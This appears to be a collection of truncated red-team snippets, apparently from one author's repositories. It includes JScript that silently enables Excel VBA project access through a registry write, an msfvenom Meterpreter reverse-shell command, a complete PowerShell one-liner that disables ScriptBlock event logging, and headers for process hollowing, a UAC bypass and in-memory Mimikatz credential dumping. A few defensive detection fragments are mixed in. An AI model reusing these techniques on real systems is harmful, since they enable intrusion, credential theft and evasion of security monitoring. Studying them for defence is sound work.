sasqwatch

<html>
	<head>
		<script>
			var objExcel = new ActiveXObject("Excel.Application");
			objExcel.Visible = false;
			var WshShell = new ActiveXObject("WScript.Shell");
			var Application_Version = objExcel.Version;//Auto-Detect Version
			var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
			WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
			var objWorkbook = objExcel.Workbooks.Add();

sasqwatch

# Resource Script
# Build Your Payload
# msfvenom --payload windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=8443 --format vba > vba3.txt
# msfconsole -r setup.rc 

spool /root/msflog.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true

sasqwatch

# These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry
[Flags()]
enum RegistryOptions {
    CloseKey              = 0x00000001
    QuerySecurityKey      = 0x00000002
    SetSecurityKey        = 0x00000004
    EnumerateValueKey     = 0x00000010
    QueryMultipleValueKey = 0x00000020
    SetInformationKey     = 0x00000040
    FlushKey              = 0x00000080

sasqwatch

/***************
 * Simple Process Hollowing in C# 
 *
 * #Build Your Binaries
 * 		c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
 *  
 *  @author: Michael Gorelik <[email protected]>
 *  gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
 * #Most of the code taken from here: @github: github.com/ambray

sasqwatch

#Function written by Michael Gorelik, Twitter: @smgoreli 
function ListOfLoadableExecutables
{
	Param
	(   
	    [Parameter( Position = 0, Mandatory = $True )]
	    [String]
	    $DirLocation,
	        
	    [Parameter( Position = 1, Mandatory = $True )]

sasqwatch

function Get-ClrReflection
{
    <# 
    .SYNOPSIS 
    
    Detects memory-only CLR (.NET) modules
     
    Author: Joe Desimone (@dez_) 
    License: BSD 3-Clause 
    

sasqwatch

#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
# 
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)

sasqwatch

# -*- coding: utf-8 -*-
# All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :))
# This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True.
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum

kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
shell32  = WinDLL('shell32' , use_last_error=True)

sasqwatch

#
function Invoke-Mimikatz
{
<#
.SYNOPSIS

This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk. 
The script has a ComputerName parameter which allows it to be executed against multiple computers.

sasqwatch

//Invoke-WebRequest in Powershell - manually whitelist legit content first: 
Mozilla/*WindowsPowerShell/*

System.Net.WebClient.DownloadFile():
None

//Start-BitsTransfer - manually whitelist legit content first:
Microsoft BITS/*

//certutil.exe - manually whitelist legit content first: